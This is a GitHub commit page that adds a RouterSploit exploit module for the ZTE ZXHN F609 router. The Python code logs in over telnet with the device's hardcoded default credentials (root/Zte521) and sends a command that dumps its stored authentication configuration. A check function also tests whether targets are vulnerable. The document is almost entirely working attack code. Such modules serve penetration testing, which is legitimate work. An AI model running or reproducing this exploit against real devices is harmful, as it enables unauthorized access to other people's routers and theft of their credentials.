Merge pull request #98 from devilscream/master

Adding ZTE F609 Config Disclosure exploit

Merge pull request #98 from devilscream/master
Adding ZTE F609 Config Disclosure exploit
4a5f0619 · Marcin Bury · GitHub · 3293a140 · 6b3dc9bd · 4a5f0619
Commit 4a5f0619 authored Jun 19, 2016 by Marcin Bury Committed by GitHub Jun 19, 2016
Hide whitespace changes
Inline Side-by-side

Showing with 83 additions and 0 deletions

f609_config_disclosure.py routersploit/modules/exploits/zte/f609_config_disclosure.py +83 -0

No files found.
--- a/routersploit/modules/exploits/zte/f609_config_disclosure.py
+++ b/routersploit/modules/exploits/zte/f609_config_disclosure.py
+import telnetlib
+from routersploit import (
+    exploits,
+    print_status,
+    print_success,
+    print_error,
+    mute,
+)
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for ZTE F609 Config Disclosure.
+    If the target is vulnerable it is possible to authenticate to the device"
+    """
+    __info__ = {
+        'name': 'ZTE F609 Config Disclosure',
+        'description': 'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.',
+        'authors': [
+            'devilscream',  # routersploit module
+        ],
+        'references': [
+            'https://www.youtube.com/watch?v=YlUqPbhzJLk',
+        ],
+        'devices': [
+            'ZTE ZXHN F609',
+        ]
+    }
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+    username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
+    password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
+    config = "sendcmd 1 DB p DevAuthInfo"
+    def run(self):
+        try:
+            print_status("Trying to authenticate to the telnet server")
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            if i != -1:
+                print_error("Exploit failed")
+            else:
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    print_success("Authentication successful")
+                    print_status("Displaying configuration:")
+                    tn.write(self.config + "\r\n")
+                    tn.interact()
+                else:
+                    print_error("Exploit failed")
+            tn.close()
+        except:
+            print_error("Connection error: {}:{}".format(self.target, 23))
+    @mute
+    def check(self):
+        try:
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            tn.write(self.config + "\r\n")
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            tn.close()
+            if i != -1:
+                return False  # target is not vulnerable
+            else:
+                if "<DM name=" in res:
+                    return True  # target is vulnerable
+        except:
+            return False  # target is not vulnerable
+        return False  # target is not vulnerable